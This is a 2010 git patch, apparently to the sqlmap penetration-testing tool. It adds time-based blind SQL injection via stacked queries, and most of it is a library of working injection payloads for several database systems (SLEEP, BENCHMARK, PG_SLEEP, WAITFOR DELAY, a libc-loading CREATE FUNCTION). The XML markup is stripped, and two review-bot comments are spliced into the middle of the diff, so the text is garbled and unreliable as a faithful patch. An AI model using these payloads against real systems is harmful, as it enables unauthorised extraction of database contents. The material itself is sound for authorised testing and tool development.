From f5ce739bdf1114ea6caa3e4795ae622a8e8c73d3 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Wed, 8 Dec 2010 23:52:31 +0000
Subject: [PATCH] Added support for time-based blind SQL injection via stacked queries too. Need to add vectors for some DBMS yet.

---
 lib/request/inject.py | 7 +-
 lib/techniques/blind/inference.py | 2 +-
 xml/payloads.xml | 115 +++++++++++++++++++++---
 3 files changed, 88 insertions(+), 36 deletions(-)

diff --git a/lib/request/inject.py b/lib/request/inject.py
index 4a0b93792..6e46b7fbd 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -413,8 +413,11 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
 value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
 found = value or (value is None and expectingNone)
- if time and kb.timeTest and not found:
- kb.technique = PAYLOAD.TECHNIQUE.TIME
+ if time and (kb.timeTest or kb.stackedTest) and not found:
+ if kb.timeTest:
+ kb.technique = PAYLOAD.TECHNIQUE.TIME
+ elif kb.stackedTest:
+ kb.technique = PAYLOAD.TECHNIQUE.STACKED
 while len(kb.responseTimes) < MIN_TIME_RESPONSES:
 _ = Request.queryPage(content=True)
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 142df3269..c8dc5399d 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -45,7 +45,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 partialValue = ""
 finalValue = ""
 asciiTbl = getCharset(charsetType)
- timeBasedCompare = (kb.technique == PAYLOAD.TECHNIQUE.TIME)
+ timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
 # Set kb.partRun in case "common prediction" feature (a.k.a. "good
 # samaritan") is used
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 1ccad0ab0..b4447bd9d 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
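Review bot: The inner `elif kb.stackedTest:` in the new getValue branch is redundant, because the enclosing `if time and (kb.timeTest or kb.stackedTest) and not found:` already guarantees that one of the two flags is set, so the `elif` can only ever be reached with kb.stackedTest true. Writing it as `else:` makes the precedence explicit and avoids a silent no-op if a third flag is ever added to the outer condition. The choice to prefer TIME over STACKED when both were detected is also undocumented; a comment such as `# prefer plain time-based inference over stacked queries when both are available` would record the intent. The body of getValue continues outside the hunk, so whether kb.technique is restored afterwards cannot be seen here.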
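Review bot: The renamed condition in bisection now sets `timeBasedCompare` for PAYLOAD.TECHNIQUE.STACKED as well, but nothing in the hunk records why a stacked-query technique is compared by response time rather than by page content, and the variable name no longer says so on its own. A short comment on the assignment, e.g. `# stacked-query inference is also timing-driven here (see getValue in lib/request/inject.py)`, would keep the two files in step; if the stacked technique is ever used with a non-timing payload this flag will presumably be wrong, so the assumption is worth stating. The rest of bisection lies outside the hunk.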
@@ -161,7 +161,7 @@ Tag: SQL injections. Sub-tag: - #TODO + # TODO Sub-tag:
Which details can be infered if the payload succeed. @@ -172,7 +172,7 @@ Tag: Sub-tags: What is the database management system version (e.g. 5.0.51). - Sub-tags: + Sub-tags: What is the database management system underlying operating system. @@ -1206,6 +1206,7 @@ Formats: 0 0 1 + ; IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]); ; SELECT SLEEP([SLEEPTIME]); # @@ -1226,6 +1227,7 @@ Formats: 0 0 1 + ; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]); ; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')); # @@ -1245,6 +1247,7 @@ Formats: 0 0 1 + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); ; SELECT PG_SLEEP([SLEEPTIME]); -- @@ -1259,14 +1262,15 @@ Formats: - PostgreSQL < 8.2 stacked queries (heavy query) + PostgreSQL stacked queries (heavy query) 4 - 3 + 2 0 0 1 + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END); - ; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, [SLEEPTIME]000000)); + ; SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000); -- @@ -1274,7 +1278,6 @@ Formats:
PostgreSQL - < 8.2
@@ -1285,8 +1288,9 @@ Formats: 0 0 1 + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); - ; CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); + ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); -- @@ -1306,6 +1310,7 @@ Formats: 0 0 1 + ; WAITFOR DELAY '0:0:[SLEEPTIME]'; -- @@ -1325,6 +1330,7 @@ Formats: 0 0 1 + ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END; -- @@ -1344,6 +1350,7 @@ Formats: 0 0 1 + ; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00); -- @@ -1363,6 +1370,7 @@ Formats: 0 0 1 + ; EXEC USER_LOCK.SLEEP([SLEEPTIME].00); -- @@ -1382,6 +1390,7 @@ Formats: 0 0 1 + ; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))); -- @@ -1402,8 +1411,9 @@ Formats: 0 0 1 + - ; SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6; + ; SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6; -- @@ -1448,7 +1458,7 @@ Formats: 1 AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) - AND BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) @@ -1459,15 +1469,35 @@ Formats: - PostgreSQL AND time-based blind (heavy query) + PostgreSQL > 8.1 AND time-based blind 5 - 1 + 2 1 1,2,3 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL AND time-based blind (heavy query) + 5 + 3 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) @@ -1484,9 +1514,9 @@ Formats: 1 1,2,3 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) - AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) + AND [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) @@ -1522,9 +1552,9 @@ Formats: 1 1,2,3 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) - AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) + AND [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) 
@@ -1561,9 +1591,9 @@ Formats: 1 1 1 - AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) - AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) + AND [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) @@ -1585,10 +1615,9 @@ Formats: 3 1,2,3 2 - - OR IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])=0 + OR [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]) - OR SLEEP([SLEEPTIME])=0 + OR [RANDNUM]=SLEEP([SLEEPTIME]) @@ -1602,13 +1631,13 @@ Formats: MySQL < 5.0.12 OR time-based blind (heavy query) 5 - 3 + 4 3 1,2,3 2 OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) - OR BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) @@ -1619,15 +1648,35 @@ Formats: - PostgreSQL OR time-based blind (heavy query) + PostgreSQL > 8.1 OR time-based blind 5 3 3 1,2,3 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 2 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) @@ -1644,9 +1693,9 @@ Formats: 3 1,2,3 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) - OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) + OR [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) @@ -1682,9 +1731,9 @@ Formats: 4 1,2,3 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) - OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) + OR [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) 
@@ -1721,9 +1770,9 @@ Formats: 3 1 2 - OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) - OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) + OR [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)